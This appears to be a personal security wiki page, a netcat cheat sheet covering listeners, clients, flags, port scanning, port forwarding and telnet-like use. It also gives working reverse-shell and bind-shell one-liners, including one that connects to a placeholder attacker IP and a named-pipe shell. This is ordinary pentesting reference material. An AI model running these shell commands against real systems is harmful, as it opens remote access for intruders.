netcat - Cardboard Iguana Security

# netcat The netcat binary is *usually* nc, but some systems have it as ncat or netcat instead. ## Start a server ```bash nc -l -p $PORT $HOST ``` The `$HOST` specification here is optional; if left off, netcat binds to 0.0.0.0. Note that netcat will exit once the first connection closes. (According to the netcat docs, it looks like `nc -l $HOST $PORT` should also work, but it doesn't. I think - though I haven't been able to verify - that what's happening here is that `-p` specifies the port to *listen* to, while the port following the `$HOST` specification is the port to *connect* to.) A netcat server doesn't have to be used just for reverse shells. For example, you can also use it to catch web requests in conjunction with [[XSS attacks|XSS]] or [[SQL injection attacks|SQLi]] attacks. ## Start a client ```bash nc $HOST $PORT ``` *Some* versions of netcat support an `-e` flag that hooks STDIN and STDOUT of an executable to the established network connection. So something like the following will establish a reverse shell: ```bash nc -e /bin/bash $HOST $PORT ``` > [!important] > The `-e` flag (and similar `-c` flag) is considered a security risk (for obvious reasons!) and is disabled on many systems. ## Useful flags - `-l` - listen for incoming connections (rather than make an outgoing connection) - `-v` - verbose - `-n` - skip DNS resolution (slightly faster, less noisy on the network) - `-p` - specify the port to *listen* to - `-u` - connect using [[UDP]] instead of [[TCP]] - `-k` - keep listening even after client disconnects > [!important] > The `-c` and `-e` flags, which allow netcat to hook other applications, are considered security risks (for obvious reasons!) and are disabled on many systems. ## Reverse shells Example reverse shell: - Attacker: `nc -lvnp $LISTENER_PORT` - Target: `nc $ATTACKER_IP $LISTENER_PORT -e /bin/bash` It's also possible to start the listener on the target and then connect from the attacker system; this is sometimes called a "bind" shell: - Attacker: `nc $TARGET_IP $LISTENER_PORT` - Target: `nc -lvnp $LISTENER_PORT -e /bin/bash` These are almost, but not quite, mirror images of each other. > [!important] > The `-e` flag (and similar `-c` flag) is considered a security risk (for obvious reasons!) and is disabled on many systems. If the `-c` or `-e` flags aren't available (which is normal these days), then named pipes can be used instead: ```bash mkfifo /tmp/p; \ nc -lvnp $LISTENER_PORT < /tmp/p | \ /bin/sh >/tmp/p 2>&1; \ rm /tmp/p ``` (Note that it's also possible to reverse the /bin/sh and netcat portions of things; what important is that the named pipe lets us loop I/O between the two applications. See the discussion of [[msfvenom]] payloads for a detailed breakdown of this pattern.) Initial netcat reverse shells (in particular web shells) are non-interactive. ## Shell "stabilization" ![[Shell stabilization|spells/Shell stabilization]] ## Port scanning With the `-z` option, netcat will attempt to connect to all [[TCP]] ports on the targets in a sequential fashion (if no ports are specified; otherwise just to the specified port), reporting which are open. It's like a simple, very slow version of [[Nmap]]! Use `-w` to set the timeout in seconds. Use `-u` to try connecting over [[UDP]] rather than [[TCP]]. ## Port forwarding ```bash nc -lvkp $LOCAL_PORT -c "nc $REMOTE_IP $REMOTE_PORT" ``` ## As a telnet replacement If you just have netcat connect to a service directly, it functions exactly like telnet.